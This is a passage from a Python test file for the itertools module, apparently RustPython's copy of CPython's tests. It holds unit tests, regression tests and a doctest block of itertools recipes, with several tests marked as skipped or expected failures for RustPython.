self.assertEqual(list(a), long_ans[100:])
self.assertEqual(list(b), long_ans[60:])
# check deepcopy
a, b = tee('abc')
self.assertEqual(list(copy.deepcopy(a)), ans)
self.assertEqual(list(copy.deepcopy(b)), ans)
self.assertEqual(list(a), ans)
self.assertEqual(list(b), ans)
a, b = tee(range(10000))
self.assertEqual(list(copy.deepcopy(a)), long_ans)
self.assertEqual(list(copy.deepcopy(b)), long_ans)
self.assertEqual(list(a), long_ans)
self.assertEqual(list(b), long_ans)
# check partially consumed deepcopy
a, b = tee('abc')
take(2, a)
take(1, b)
self.assertEqual(list(copy.deepcopy(a)), ans[2:])
self.assertEqual(list(copy.deepcopy(b)), ans[1:])
self.assertEqual(list(a), ans[2:])
self.assertEqual(list(b), ans[1:])
a, b = tee(range(10000))
take(100, a)
take(60, b)
self.assertEqual(list(copy.deepcopy(a)), long_ans[100:])
self.assertEqual(list(copy.deepcopy(b)), long_ans[60:])
self.assertEqual(list(a), long_ans[100:])
self.assertEqual(list(b), long_ans[60:])
# check pickle
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, iter(tee('abc')))
a, b = tee('abc')
self.pickletest(proto, a, compare=ans)
self.pickletest(proto, b, compare=ans)
# Issue 13454: Crash when deleting backward iterator from tee()
# TODO: RUSTPYTHON
@unittest.skip("hangs")
def test_tee_del_backward(self):
forward, backward = tee(repeat(None, 20000000))
try:
any(forward) # exhaust the iterator
del backward
except:
del forward, backward
raise
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_tee_reenter(self):
class I:
first = True
def __iter__(self):
return self
def __next__(self):
first = self.first
self.first = False
if first:
return next(b)
a, b = tee(I())
with self.assertRaisesRegex(RuntimeError, "tee"):
next(a)
# TODO: RUSTPYTHON - hangs
@unittest.skip("hangs")
def test_tee_concurrent(self):
start = threading.Event()
finish = threading.Event()
class I:
def __iter__(self):
return self
def __next__(self):
start.set()
finish.wait()
a, b = tee(I())
thread = threading.Thread(target=next, args=[a])
thread.start()
try:
start.wait()
with self.assertRaisesRegex(RuntimeError, "tee"):
next(b)
finally:
finish.set()
thread.join()
def test_StopIteration(self):
self.assertRaises(StopIteration, next, zip())
for f in (chain, cycle, zip, groupby):
self.assertRaises(StopIteration, next, f([]))
self.assertRaises(StopIteration, next, f(StopNow()))
self.assertRaises(StopIteration, next, islice([], None))
self.assertRaises(StopIteration, next, islice(StopNow(), None))
p, q = tee([])
self.assertRaises(StopIteration, next, p)
self.assertRaises(StopIteration, next, q)
p, q = tee(StopNow())
self.assertRaises(StopIteration, next, p)
self.assertRaises(StopIteration, next, q)
self.assertRaises(StopIteration, next, repeat(None, 0))
for f in (filter, filterfalse, map, takewhile, dropwhile, starmap):
self.assertRaises(StopIteration, next, f(lambda x:x, []))
self.assertRaises(StopIteration, next, f(lambda x:x, StopNow()))
class TestExamples(unittest.TestCase):
def test_accumulate(self):
self.assertEqual(list(accumulate([1,2,3,4,5])), [1, 3, 6, 10, 15])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_accumulate_reducible(self):
# check copy, deepcopy, pickle
data = [1, 2, 3, 4, 5]
accumulated = [1, 3, 6, 10, 15]
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
it = accumulate(data)
self.assertEqual(list(pickle.loads(pickle.dumps(it, proto))), accumulated[:])
self.assertEqual(next(it), 1)
self.assertEqual(list(pickle.loads(pickle.dumps(it, proto))), accumulated[1:])
it = accumulate(data)
self.assertEqual(next(it), 1)
self.assertEqual(list(copy.deepcopy(it)), accumulated[1:])
self.assertEqual(list(copy.copy(it)), accumulated[1:])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_accumulate_reducible_none(self):
# Issue #25718: total is None
it = accumulate([None, None, None], operator.is_)
self.assertEqual(next(it), None)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
it_copy = pickle.loads(pickle.dumps(it, proto))
self.assertEqual(list(it_copy), [True, False])
self.assertEqual(list(copy.deepcopy(it)), [True, False])
self.assertEqual(list(copy.copy(it)), [True, False])
def test_chain(self):
self.assertEqual(''.join(chain('ABC', 'DEF')), 'ABCDEF')
def test_chain_from_iterable(self):
self.assertEqual(''.join(chain.from_iterable(['ABC', 'DEF'])), 'ABCDEF')
def test_combinations(self):
self.assertEqual(list(combinations('ABCD', 2)),
[('A','B'), ('A','C'), ('A','D'), ('B','C'), ('B','D'), ('C','D')])
self.assertEqual(list(combinations(range(4), 3)),
[(0,1,2), (0,1,3), (0,2,3), (1,2,3)])
def test_combinations_with_replacement(self):
self.assertEqual(list(combinations_with_replacement('ABC', 2)),
[('A','A'), ('A','B'), ('A','C'), ('B','B'), ('B','C'), ('C','C')])
def test_compress(self):
self.assertEqual(list(compress('ABCDEF', [1,0,1,0,1,1])), list('ACEF'))
def test_count(self):
self.assertEqual(list(islice(count(10), 5)), [10, 11, 12, 13, 14])
def test_cycle(self):
self.assertEqual(list(islice(cycle('ABCD'), 12)), list('ABCDABCDABCD'))
def test_dropwhile(self):
self.assertEqual(list(dropwhile(lambda x: x<5, [1,4,6,4,1])), [6,4,1])
def test_groupby(self):
self.assertEqual([k for k, g in groupby('AAAABBBCCDAABBB')],
list('ABCDAB'))
self.assertEqual([(list(g)) for k, g in groupby('AAAABBBCCD')],
[list('AAAA'), list('BBB'), list('CC'), list('D')])
def test_filter(self):
self.assertEqual(list(filter(lambda x: x%2, range(10))), [1,3,5,7,9])
def test_filterfalse(self):
self.assertEqual(list(filterfalse(lambda x: x%2, range(10))), [0,2,4,6,8])
def test_map(self):
self.assertEqual(list(map(pow, (2,3,10), (5,2,3))), [32, 9, 1000])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_islice(self):
self.assertEqual(list(islice('ABCDEFG', 2)), list('AB'))
self.assertEqual(list(islice('ABCDEFG', 2, 4)), list('CD'))
self.assertEqual(list(islice('ABCDEFG', 2, None)), list('CDEFG'))
self.assertEqual(list(islice('ABCDEFG', 0, None, 2)), list('ACEG'))
def test_zip(self):
self.assertEqual(list(zip('ABCD', 'xy')), [('A', 'x'), ('B', 'y')])
def test_zip_longest(self):
self.assertEqual(list(zip_longest('ABCD', 'xy', fillvalue='-')),
[('A', 'x'), ('B', 'y'), ('C', '-'), ('D', '-')])
def test_permutations(self):
self.assertEqual(list(permutations('ABCD', 2)),
list(map(tuple, 'AB AC AD BA BC BD CA CB CD DA DB DC'.split())))
self.assertEqual(list(permutations(range(3))),
[(0,1,2), (0,2,1), (1,0,2), (1,2,0), (2,0,1), (2,1,0)])
def test_product(self):
self.assertEqual(list(product('ABCD', 'xy')),
list(map(tuple, 'Ax Ay Bx By Cx Cy Dx Dy'.split())))
self.assertEqual(list(product(range(2), repeat=3)),
[(0,0,0), (0,0,1), (0,1,0), (0,1,1),
(1,0,0), (1,0,1), (1,1,0), (1,1,1)])
def test_repeat(self):
self.assertEqual(list(repeat(10, 3)), [10, 10, 10])
    def test_starmap(self):
self.assertEqual(list(starmap(pow, [(2,5), (3,2), (10,3)])),
[32, 9, 1000])
def test_takewhile(self):
self.assertEqual(list(takewhile(lambda x: x<5, [1,4,6,4,1])), [1,4])
class TestPurePythonRoughEquivalents(unittest.TestCase):
@staticmethod
def islice(iterable, *args):
s = slice(*args)
start, stop, step = s.start or 0, s.stop or sys.maxsize, s.step or 1
it = iter(range(start, stop, step))
try:
nexti = next(it)
except StopIteration:
# Consume *iterable* up to the *start* position.
for i, element in zip(range(start), iterable):
pass
return
try:
for i, element in enumerate(iterable):
if i == nexti:
yield element
nexti = next(it)
except StopIteration:
# Consume to *stop*.
for i, element in zip(range(i + 1, stop), iterable):
pass
def test_islice_recipe(self):
self.assertEqual(list(self.islice('ABCDEFG', 2)), list('AB'))
self.assertEqual(list(self.islice('ABCDEFG', 2, 4)), list('CD'))
self.assertEqual(list(self.islice('ABCDEFG', 2, None)), list('CDEFG'))
self.assertEqual(list(self.islice('ABCDEFG', 0, None, 2)), list('ACEG'))
# Test items consumed.
it = iter(range(10))
self.assertEqual(list(self.islice(it, 3)), list(range(3)))
self.assertEqual(list(it), list(range(3, 10)))
it = iter(range(10))
self.assertEqual(list(self.islice(it, 3, 3)), [])
self.assertEqual(list(it), list(range(3, 10)))
# Test that slice finishes in predictable state.
c = count()
self.assertEqual(list(self.islice(c, 1, 3, 50)), [1])
self.assertEqual(next(c), 3)
class TestGC(unittest.TestCase):
def makecycle(self, iterator, container):
container.append(iterator)
next(iterator)
del container, iterator
def test_accumulate(self):
a = []
self.makecycle(accumulate([1,2,a,3]), a)
def test_chain(self):
a = []
self.makecycle(chain(a), a)
def test_chain_from_iterable(self):
a = []
self.makecycle(chain.from_iterable([a]), a)
def test_combinations(self):
a = []
self.makecycle(combinations([1,2,a,3], 3), a)
def test_combinations_with_replacement(self):
a = []
self.makecycle(combinations_with_replacement([1,2,a,3], 3), a)
def test_compress(self):
a = []
self.makecycle(compress('ABCDEF', [1,0,1,0,1,0]), a)
def test_count(self):
a = []
Int = type('Int', (int,), dict(x=a))
self.makecycle(count(Int(0), Int(1)), a)
def test_cycle(self):
a = []
self.makecycle(cycle([a]*2), a)
def test_dropwhile(self):
a = []
self.makecycle(dropwhile(bool, [0, a, a]), a)
def test_groupby(self):
a = []
self.makecycle(groupby([a]*2, lambda x:x), a)
def test_issue2246(self):
# Issue 2246 -- the _grouper iterator was not included in GC
n = 10
keyfunc = lambda x: x
for i, j in groupby(range(n), key=keyfunc):
keyfunc.__dict__.setdefault('x',[]).append(j)
def test_filter(self):
a = []
self.makecycle(filter(lambda x:True, [a]*2), a)
def test_filterfalse(self):
a = []
self.makecycle(filterfalse(lambda x:False, a), a)
def test_zip(self):
a = []
self.makecycle(zip([a]*2, [a]*3), a)
def test_zip_longest(self):
a = []
self.makecycle(zip_longest([a]*2, [a]*3), a)
b = [a, None]
self.makecycle(zip_longest([a]*2, [a]*3, fillvalue=b), a)
def test_map(self):
a = []
self.makecycle(map(lambda x:x, [a]*2), a)
def test_islice(self):
a = []
self.makecycle(islice([a]*2, None), a)
def test_permutations(self):
a = []
self.makecycle(permutations([1,2,a,3], 3), a)
def test_product(self):
a = []
self.makecycle(product([1,2,a,3], repeat=3), a)
def test_repeat(self):
a = []
self.makecycle(repeat(a), a)
def test_starmap(self):
a = []
self.makecycle(starmap(lambda *t: t, [(a,a)]*2), a)
def test_takewhile(self):
a = []
self.makecycle(takewhile(bool, [1, 0, a, a]), a)
def R(seqn):
'Regular generator'
for i in seqn:
yield i
class G:
'Sequence using __getitem__'
def __init__(self, seqn):
self.seqn = seqn
def __getitem__(self, i):
return self.seqn[i]
class I:
'Sequence using iterator protocol'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class Ig:
'Sequence using iterator protocol defined with a generator'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
for val in self.seqn:
yield val
class X:
'Missing __getitem__ and __iter__'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class N:
'Iterator missing __next__()'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
class E:
'Test propagation of exceptions'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
3 // 0
class S:
'Test immediate stop'
def __init__(self, seqn):
pass
def __iter__(self):
return self
def __next__(self):
raise StopIteration
def L(seqn):
'Test multiple tiers of iterators'
return chain(map(lambda x:x, R(Ig(G(seqn)))))
class TestVariousIteratorArgs(unittest.TestCase):
def test_accumulate(self):
s = [1,2,3,4,5]
r = [1,3,6,10,15]
n = len(s)
for g in (G, I, Ig, L, R):
self.assertEqual(list(accumulate(g(s))), r)
self.assertEqual(list(accumulate(S(s))), [])
self.assertRaises(TypeError, accumulate, X(s))
self.assertRaises(TypeError, accumulate, N(s))
self.assertRaises(ZeroDivisionError, list, accumulate(E(s)))
def test_chain(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(chain(g(s))), list(g(s)))
self.assertEqual(list(chain(g(s), g(s))), list(g(s))+list(g(s)))
self.assertRaises(TypeError, list, chain(X(s)))
self.assertRaises(TypeError, list, chain(N(s)))
self.assertRaises(ZeroDivisionError, list, chain(E(s)))
def test_compress(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
n = len(s)
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(compress(g(s), repeat(1))), list(g(s)))
self.assertRaises(TypeError, compress, X(s), repeat(1))
self.assertRaises(TypeError, compress, N(s), repeat(1))
self.assertRaises(ZeroDivisionError, list, compress(E(s), repeat(1)))
def test_product(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
self.assertRaises(TypeError, product, X(s))
self.assertRaises(TypeError, product, N(s))
self.assertRaises(ZeroDivisionError, product, E(s))
def test_cycle(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgtlen = len(s) * 3
expected = list(g(s))*3
actual = list(islice(cycle(g(s)), tgtlen))
self.assertEqual(actual, expected)
self.assertRaises(TypeError, cycle, X(s))
self.assertRaises(TypeError, cycle, N(s))
self.assertRaises(ZeroDivisionError, list, cycle(E(s)))
def test_groupby(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual([k for k, sb in groupby(g(s))], list(g(s)))
self.assertRaises(TypeError, groupby, X(s))
self.assertRaises(TypeError, groupby, N(s))
self.assertRaises(ZeroDivisionError, list, groupby(E(s)))
def test_filter(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(filter(isEven, g(s))),
[x for x in g(s) if isEven(x)])
self.assertRaises(TypeError, filter, isEven, X(s))
self.assertRaises(TypeError, filter, isEven, N(s))
self.assertRaises(ZeroDivisionError, list, filter(isEven, E(s)))
def test_filterfalse(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(filterfalse(isEven, g(s))),
[x for x in g(s) if isOdd(x)])
self.assertRaises(TypeError, filterfalse, isEven, X(s))
self.assertRaises(TypeError, filterfalse, isEven, N(s))
self.assertRaises(ZeroDivisionError, list, filterfalse(isEven, E(s)))
def test_zip(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(zip(g(s))), lzip(g(s)))
self.assertEqual(list(zip(g(s), g(s))), lzip(g(s), g(s)))
self.assertRaises(TypeError, zip, X(s))
self.assertRaises(TypeError, zip, N(s))
self.assertRaises(ZeroDivisionError, list, zip(E(s)))
def test_ziplongest(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(zip_longest(g(s))), list(zip(g(s))))
self.assertEqual(list(zip_longest(g(s), g(s))), list(zip(g(s), g(s))))
self.assertRaises(TypeError, zip_longest, X(s))
self.assertRaises(TypeError, zip_longest, N(s))
self.assertRaises(ZeroDivisionError, list, zip_longest(E(s)))
def test_map(self):
for s in (range(10), range(0), range(100), (7,11), range(20,50,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(map(onearg, g(s))),
[onearg(x) for x in g(s)])
self.assertEqual(list(map(operator.pow, g(s), g(s))),
[x**x for x in g(s)])
self.assertRaises(TypeError, map, onearg, X(s))
self.assertRaises(TypeError, map, onearg, N(s))
self.assertRaises(ZeroDivisionError, list, map(onearg, E(s)))
def test_islice(self):
for s in ("12345", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(islice(g(s),1,None,2)), list(g(s))[1::2])
self.assertRaises(TypeError, islice, X(s), 10)
self.assertRaises(TypeError, islice, N(s), 10)
self.assertRaises(ZeroDivisionError, list, islice(E(s), 10))
def test_starmap(self):
for s in (range(10), range(0), range(100), (7,11), range(20,50,5)):
for g in (G, I, Ig, S, L, R):
ss = lzip(s, s)
self.assertEqual(list(starmap(operator.pow, g(ss))),
[x**x for x in g(s)])
self.assertRaises(TypeError, starmap, operator.pow, X(ss))
self.assertRaises(TypeError, starmap, operator.pow, N(ss))
self.assertRaises(ZeroDivisionError, list, starmap(operator.pow, E(ss)))
def test_takewhile(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgt = []
for elem in g(s):
if not isEven(elem): break
tgt.append(elem)
self.assertEqual(list(takewhile(isEven, g(s))), tgt)
self.assertRaises(TypeError, takewhile, isEven, X(s))
self.assertRaises(TypeError, takewhile, isEven, N(s))
self.assertRaises(ZeroDivisionError, list, takewhile(isEven, E(s)))
def test_dropwhile(self):
for s in (range(10), range(0), range(1000), (7,11), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgt = []
for elem in g(s):
if not tgt and isOdd(elem): continue
tgt.append(elem)
self.assertEqual(list(dropwhile(isOdd, g(s))), tgt)
self.assertRaises(TypeError, dropwhile, isOdd, X(s))
self.assertRaises(TypeError, dropwhile, isOdd, N(s))
self.assertRaises(ZeroDivisionError, list, dropwhile(isOdd, E(s)))
def test_tee(self):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
it1, it2 = tee(g(s))
self.assertEqual(list(it1), list(g(s)))
self.assertEqual(list(it2), list(g(s)))
self.assertRaises(TypeError, tee, X(s))
self.assertRaises(TypeError, tee, N(s))
self.assertRaises(ZeroDivisionError, list, tee(E(s))[0])
class LengthTransparency(unittest.TestCase):
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_repeat(self):
self.assertEqual(operator.length_hint(repeat(None, 50)), 50)
self.assertEqual(operator.length_hint(repeat(None, 0)), 0)
self.assertEqual(operator.length_hint(repeat(None), 12), 12)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_repeat_with_negative_times(self):
self.assertEqual(operator.length_hint(repeat(None, -1)), 0)
self.assertEqual(operator.length_hint(repeat(None, -2)), 0)
self.assertEqual(operator.length_hint(repeat(None, times=-1)), 0)
self.assertEqual(operator.length_hint(repeat(None, times=-2)), 0)
class RegressionTests(unittest.TestCase):
def test_sf_793826(self):
# Fix Armin Rigo's successful efforts to wreak havoc
def mutatingtuple(tuple1, f, tuple2):
# this builds a tuple t which is a copy of tuple1,
# then calls f(t), then mutates t to be equal to tuple2
# (needs len(tuple1) == len(tuple2)).
def g(value, first=[1]):
if first:
del first[:]
f(next(z))
return value
items = list(tuple2)
items[1:1] = list(tuple1)
gen = map(g, items)
z = zip(*[gen]*len(tuple1))
next(z)
def f(t):
global T
T = t
first[:] = list(T)
first = []
mutatingtuple((1,2,3), f, (4,5,6))
second = list(T)
self.assertEqual(first, second)
def test_sf_950057(self):
# Make sure that chain() and cycle() catch exceptions immediately
# rather than when shifting between input sources
def gen1():
hist.append(0)
yield 1
hist.append(1)
raise AssertionError
hist.append(2)
def gen2(x):
hist.append(3)
yield 2
hist.append(4)
hist = []
self.assertRaises(AssertionError, list, chain(gen1(), gen2(False)))
self.assertEqual(hist, [0,1])
hist = []
self.assertRaises(AssertionError, list, chain(gen1(), gen2(True)))
self.assertEqual(hist, [0,1])
hist = []
self.assertRaises(AssertionError, list, cycle(gen1()))
self.assertEqual(hist, [0,1])
@support.skip_if_pgo_task
def test_long_chain_of_empty_iterables(self):
# Make sure itertools.chain doesn't run into recursion limits when
# dealing with long chains of empty iterables. Even with a high
# number this would probably only fail in Py_DEBUG mode.
it = chain.from_iterable(() for unused in range(10000000))
with self.assertRaises(StopIteration):
next(it)
def test_issue30347_1(self):
def f(n):
if n == 5:
list(b)
return n != 6
for (k, b) in groupby(range(10), f):
list(b) # shouldn't crash
def test_issue30347_2(self):
class K:
def __init__(self, v):
pass
def __eq__(self, other):
nonlocal i
i += 1
if i == 1:
next(g, None)
return True
i = 0
g = next(groupby(range(10), K))[1]
for j in range(2):
next(g, None) # shouldn't crash
class SubclassWithKwargsTest(unittest.TestCase):
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_keywords_in_subclass(self):
# count is not subclassable...
for cls in (repeat, zip, filter, filterfalse, chain, map,
starmap, islice, takewhile, dropwhile, cycle, compress):
class Subclass(cls):
def __init__(self, newarg=None, *args):
cls.__init__(self, *args)
try:
Subclass(newarg=1)
except TypeError as err:
# we expect type errors because of wrong argument count
self.assertNotIn("keyword arguments", err.args[0])
@support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.ssize_t = struct.calcsize('n')
check_sizeof = support.check_sizeof
def test_product_sizeof(self):
basesize = support.calcobjsize('3Pi')
check = self.check_sizeof
check(product('ab', '12'), basesize + 2 * self.ssize_t)
check(product(*(('abc',) * 10)), basesize + 10 * self.ssize_t)
def test_combinations_sizeof(self):
basesize = support.calcobjsize('3Pni')
check = self.check_sizeof
check(combinations('abcd', 3), basesize + 3 * self.ssize_t)
check(combinations(range(10), 4), basesize + 4 * self.ssize_t)
def test_combinations_with_replacement_sizeof(self):
cwr = combinations_with_replacement
basesize = support.calcobjsize('3Pni')
check = self.check_sizeof
check(cwr('abcd', 3), basesize + 3 * self.ssize_t)
check(cwr(range(10), 4), basesize + 4 * self.ssize_t)
def test_permutations_sizeof(self):
basesize = support.calcobjsize('4Pni')
check = self.check_sizeof
check(permutations('abcd'),
basesize + 4 * self.ssize_t + 4 * self.ssize_t)
check(permutations('abcd', 3),
basesize + 4 * self.ssize_t + 3 * self.ssize_t)
check(permutations('abcde', 3),
basesize + 5 * self.ssize_t + 3 * self.ssize_t)
check(permutations(range(10), 4),
basesize + 10 * self.ssize_t + 4 * self.ssize_t)
libreftest = """ Doctest for examples in the library reference: libitertools.tex
>>> amounts = [120.15, 764.05, 823.14]
>>> for checknum, amount in zip(count(1200), amounts):
... print('Check %d is for $%.2f' % (checknum, amount))
...
Check 1200 is for $120.15
Check 1201 is for $764.05
Check 1202 is for $823.14
>>> import operator
>>> for cube in map(operator.pow, range(1,4), repeat(3)):
... print(cube)
...
1
8
27
>>> reportlines = ['EuroPython', 'Roster', '', 'alex', '', 'laura', '', 'martin', '', 'walter', '', 'samuele']
>>> for name in islice(reportlines, 3, None, 2):
... print(name.title())
...
Alex
Laura
Martin
Walter
Samuele
>>> from operator import itemgetter
>>> d = dict(a=1, b=2, c=1, d=2, e=1, f=2, g=3)
>>> di = sorted(sorted(d.items()), key=itemgetter(1))
>>> for k, g in groupby(di, itemgetter(1)):
... print(k, list(map(itemgetter(0), g)))
...
1 ['a', 'c', 'e']
2 ['b', 'd', 'f']
3 ['g']
# Find runs of consecutive numbers using groupby. The key to the solution
# is differencing with a range so that consecutive numbers all appear in
# the same group.
>>> data = [ 1, 4,5,6, 10, 15,16,17,18, 22, 25,26,27,28]
>>> for k, g in groupby(enumerate(data), lambda t:t[0]-t[1]):
... print(list(map(operator.itemgetter(1), g)))
...
[1]
[4, 5, 6]
[10]
[15, 16, 17, 18]
[22]
[25, 26, 27, 28]
>>> def take(n, iterable):
... "Return first n items of the iterable as a list"
... return list(islice(iterable, n))
>>> def prepend(value, iterator):
... "Prepend a single value in front of an iterator"
... # prepend(1, [2, 3, 4]) -> 1 2 3 4
... return chain([value], iterator)
>>> def enumerate(iterable, start=0):
... return zip(count(start), iterable)
>>> def tabulate(function, start=0):
... "Return function(0), function(1), ..."
... return map(function, count(start))
>>> import collections
>>> def consume(iterator, n=None):
... "Advance the iterator n-steps ahead. If n is None, consume entirely."
... # Use functions that consume iterators at C speed.
... if n is None:
... # feed the entire iterator into a zero-length deque
... collections.deque(iterator, maxlen=0)
... else:
... # advance to the empty slice starting at position n
... next(islice(iterator, n, n), None)
>>> def nth(iterable, n, default=None):
... "Returns the nth item or a default value"
... return next(islice(iterable, n, None), default)
>>> def all_equal(iterable):
... "Returns True if all the elements are equal to each other"
... g = groupby(iterable)
... return next(g, True) and not next(g, False)
>>> def quantify(iterable, pred=bool):
... "Count how many times the predicate is true"
... return sum(map(pred, iterable))
>>> def padnone(iterable):
... "Returns the sequence elements and then returns None indefinitely"
... return chain(iterable, repeat(None))
>>> def ncycles(iterable, n):
... "Returns the sequence elements n times"
... return chain(*repeat(iterable, n))
>>> def dotproduct(vec1, vec2):
... return sum(map(operator.mul, vec1, vec2))
>>> def flatten(listOfLists):
... return list(chain.from_iterable(listOfLists))
>>> def repeatfunc(func, times=None, *args):
... "Repeat calls to func with specified arguments."
... " Example: repeatfunc(random.random)"
... if times is None:
... return starmap(func, repeat(args))
... else:
... return starmap(func, repeat(args, times))
>>> def pairwise(iterable):
... "s -> (s0,s1), (s1,s2), (s2, s3), ..."
... a, b = tee(iterable)
... try:
... next(b)
... except StopIteration:
... pass
... return zip(a, b)
>>> def grouper(n, iterable, fillvalue=None):
... "grouper(3, 'ABCDEFG', 'x') --> ABC DEF Gxx"
... args = [iter(iterable)] * n
... return zip_longest(*args, fillvalue=fillvalue)
>>> def roundrobin(*iterables):
... "roundrobin('ABC', 'D', 'EF') --> A D E B F C"
... # Recipe credited to George Sakkis
... pending = len(iterables)
... nexts = cycle(iter(it).__next__ for it in iterables)
... while pending:
... try:
... for next in nexts:
... yield next()
... except StopIteration:
... pending -= 1
... nexts = cycle(islice(nexts, pending))
>>> def powerset(iterable):
... "powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)"
... s = list(iterable)
... return chain.from_iterable(combinations(s, r) for r in range(len(s)+1))
>>> def unique_everseen(iterable, key=None):
... "List unique elements, preserving order. Remember all elements ever seen."
... # unique_everseen('AAAABBBCCDAABBB') --> A B C D
... # unique_everseen('ABBCcAD', str.lower) --> A B C D
... seen = set()
... seen_add = seen.add
... if key is None:
... for element in iterable:
... if element not in seen:
... seen_add(element)
... yield element
... else:
... for element in iterable:
... k = key(element)
... if k not in seen:
... seen_add(k)
... yield element
>>> def unique_justseen(iterable, key=None):
... "List unique elements, preserving order. Remember only the element just seen."
... # unique_justseen('AAAABBBCCDAABBB') --> A B C D A B
... # unique_justseen('ABBCcAD', str.lower) --> A B C A D
... return map(next, map(itemgetter(1), groupby(iterable, key)))
>>> def first_true(iterable, default=False, pred=None):
... '''Returns the first true value in the iterable.
...
... If no true value is found, returns *default*
...
... If *pred* is not None, returns the first item
... for which pred(item) is true.
...
... '''
... # first_true([a,b,c], x) --> a or b or c or x
... # first_true([a,b], x, f) --> a if f(a) else b if f(b) else x
... return next(filter(pred, iterable), default)
>>> def nth_combination(iterable, r, index):
... 'Equivalent to list(combinations(iterable, r))[index]'
... pool = tuple(iterable)
... n = len(pool)
... if r < 0 or r > n:
... raise ValueError
... c = 1
... k = min(r, n-r)
... for i in range(1, k+1):
... c = c * (n - k + i) // i
... if index < 0:
... index += c
... if index < 0 or index >= c:
... raise IndexError
... result = []
... while r:
... c, n, r = c*r//n, n-1, r-1
... while index >= c:
... index -= c
... c, n = c*(n-r)//n, n-1
... result.append(pool[-1-n])
... return tuple(result)
This is not part of the examples but it tests to make sure the definitions
perform as purported.
>>> take(10, count())
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> list(prepend(1, [2, 3, 4]))
[1, 2, 3, 4]
>>> list(enumerate('abc'))
[(0, 'a'), (1, 'b'), (2, 'c')]
>>> list(islice(tabulate(lambda x: 2*x), 4))
[0, 2, 4, 6]
>>> it = iter(range(10))
>>> consume(it, 3)
>>> next(it)
3
>>> consume(it)
>>> next(it, 'Done')
'Done'
>>> nth('abcde', 3)
'd'
>>> nth('abcde', 9) is None
True
>>> [all_equal(s) for s in ('', 'A', 'AAAA', 'AAAB', 'AAABA')]
[True, True, True, False, False]
>>> quantify(range(99), lambda x: x%2==0)
50
>>> a = [[1, 2, 3], [4, 5, 6]]
>>> flatten(a)
[1, 2, 3, 4, 5, 6]
>>> list(repeatfunc(pow, 5, 2, 3))
[8, 8, 8, 8, 8]
>>> import random
>>> take(5, map(int, repeatfunc(random.random)))
[0, 0, 0, 0, 0]
>>> list(pairwise('abcd'))
[('a', 'b'), ('b', 'c'), ('c', 'd')]
>>> list(pairwise([]))
[]
>>> list(pairwise('a'))
[]
>>> list(islice(padnone('abc'), 0, 6))
['a', 'b', 'c', None, None, None]
>>> list(ncycles('abc', 3))
['a', 'b', 'c', 'a', 'b', 'c', 'a', 'b', 'c']
>>> dotproduct([1,2,3], [4,5,6])
32
>>> list(grouper(3, 'abcdefg', 'x'))
[('a', 'b', 'c'), ('d', 'e', 'f'), ('g', 'x', 'x')]
>>> list(roundrobin('abc', 'd', 'ef'))
['a', 'd', 'e', 'b', 'f', 'c']
>>> list(powerset([1,2,3]))
[(), (1,), (2,), (3,), (1, 2), (1, 3), (2, 3), (1, 2, 3)]
>>> all(len(list(powerset(range(n)))) == 2**n for n in range(18))
True
>>> list(powerset('abcde')) == sorted(sorted(set(powerset('abcde'))), key=len)
True
>>> list(unique_everseen('AAAABBBCCDAABBB'))
['A', 'B', 'C', 'D']
>>> list(unique_everseen('ABBCcAD', str.lower))
['A', 'B', 'C', 'D']
>>> list(unique_justseen('AAAABBBCCDAABBB'))
['A', 'B', 'C', 'D', 'A', 'B']
>>> list(unique_justseen('ABBCcAD', str.lower))
['A', 'B', 'C', 'A', 'D']
>>> first_true('ABC0DEF1', '9', str.isdigit)
'0'
>>> population = 'ABCDEFGH'
>>> for r in range(len(population) + 1):
... seq = list(combinations(population, r))
... for i in range(len(seq)):
... assert nth_combination(population, r, i) == seq[i]
